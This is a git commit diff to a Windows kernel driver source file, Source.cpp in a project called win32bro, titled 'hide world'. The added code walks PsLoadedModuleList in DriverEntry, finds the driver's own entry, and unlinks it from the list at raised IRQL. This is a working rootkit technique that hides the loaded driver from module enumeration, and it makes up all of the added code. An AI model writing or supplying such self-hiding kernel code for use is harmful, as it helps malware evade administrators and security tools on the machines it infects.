hide world

2 years ago · 861d6b30c3
parent 19f5b464ff
commit 861d6b30c3
1 changed files with 72 additions and 0 deletions
--- a/win32bro/Source.cpp
+++ b/win32bro/Source.cpp
@ -3,10 +3,82 @@

 #define dprintf(...) DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, __VA_ARGS__)

+EXTERN_C
+PLIST_ENTRY PsLoadedModuleList;
+
+typedef struct _KLDR_DATA_TABLE_ENTRY
+{
+    LIST_ENTRY InLoadOrderLinks;
+    PVOID ExceptionTable;
+    ULONG ExceptionTableSize;
+    // ULONG padding on IA64
+    PVOID GpValue;
+    /*PNON_PAGED_DEBUG_INFO*/ PVOID NonPagedDebugInfo;
+    PVOID DllBase;
+    PVOID EntryPoint;
+    ULONG SizeOfImage;
+    UNICODE_STRING FullDllName;
+    UNICODE_STRING BaseDllName;
+    ULONG Flags;
+    USHORT LoadCount;
+    USHORT __Unused5;
+    PVOID SectionPointer;
+    ULONG CheckSum;
+    // ULONG padding on IA64
+    PVOID LoadedImports;
+    PVOID PatchInformation;
+} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
+
 EXTERN_C
 NTSTATUS
 DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath)
 {
+    // find world
+    PKLDR_DATA_TABLE_ENTRY pSelfEntry = nullptr;
+    auto pNext = PsLoadedModuleList->Flink;
+    if (pNext != NULL)
+    {
+        while (pNext != PsLoadedModuleList)
+        {
+            auto pEntry = CONTAINING_RECORD(pNext, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
+
+            auto pBase = pEntry->DllBase;
+            if (DriverObject->DriverStart == pBase)
+            {
+                pSelfEntry = pEntry;
+                dprintf("find world:%p\n", pSelfEntry);
+                break;
+            }
+
+            pNext = pNext->Flink;
+        }
+    }
+
+    // hide world
+    if (pSelfEntry)
+    {
+        KIRQL kIrql = KeRaiseIrqlToDpcLevel();
+        auto pPrevEntry = (PKLDR_DATA_TABLE_ENTRY)pSelfEntry->InLoadOrderLinks.Blink;
+        auto pNextEntry = (PKLDR_DATA_TABLE_ENTRY)pSelfEntry->InLoadOrderLinks.Flink;
+
+        if (pPrevEntry)
+        {
+            pPrevEntry->InLoadOrderLinks.Flink = pSelfEntry->InLoadOrderLinks.Flink;
+        }
+
+        if (pNextEntry)
+        {
+            pNextEntry->InLoadOrderLinks.Blink = pSelfEntry->InLoadOrderLinks.Blink;
+        }
+
+        pSelfEntry->InLoadOrderLinks.Flink = (PLIST_ENTRY)pSelfEntry;
+        pSelfEntry->InLoadOrderLinks.Blink = (PLIST_ENTRY)pSelfEntry;
+
+        KeLowerIrql(kIrql);
+
+        dprintf("hide world!\n");
+    }
+
    dprintf("end world!\n");
    return 0;
 }